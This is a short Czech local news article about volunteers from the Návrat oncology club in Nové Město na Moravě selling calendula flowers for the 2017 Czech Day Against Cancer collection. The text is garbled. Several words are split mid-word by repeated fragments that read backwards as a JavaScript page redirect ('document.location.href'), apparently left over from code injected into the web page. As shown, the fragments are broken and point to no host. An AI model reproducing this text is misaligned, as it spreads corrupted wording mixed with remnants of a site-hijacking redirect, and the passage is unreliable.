Rainbow page separator

V Novém Městě a v Bystřici nabídnou kytičky ti nejpovolanější

Pondělí, 8. května 2017

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Členové novoměstského onkologického klubu Návrat se budou ve středu 10. května angažovat při celonárodní veřejné sbírce Český den proti rakovině. Lidé je mohou potkat v ulicích Nového Města na Moravě i Bystřice nad Pernštejnem, kde budou nabízet a za minimální příspěvek ve výši dvaceti korun prodávat symbolický kvítek měsíčku lékařského, který je znakem kampaně.
Hlavním tématem sbírky pro le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok je nádorové onemocnění hlavy a krku. Žluté látkové kytičky s modrou stužkou bude při 21. ročníku sbírky v ulicích více než jedenácti s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek měst a obcí České republiky nabízet téměř 14 500 dobrovolníků ve žlutých tričkách.
V Novém Městě se prodeje zúčastní rovněž studenti tamního gymnázia, zaměstnanci prodejny Billa, stavebniny v místní části města Maršovice a prodejna tabáku na Vratislavově náměstí.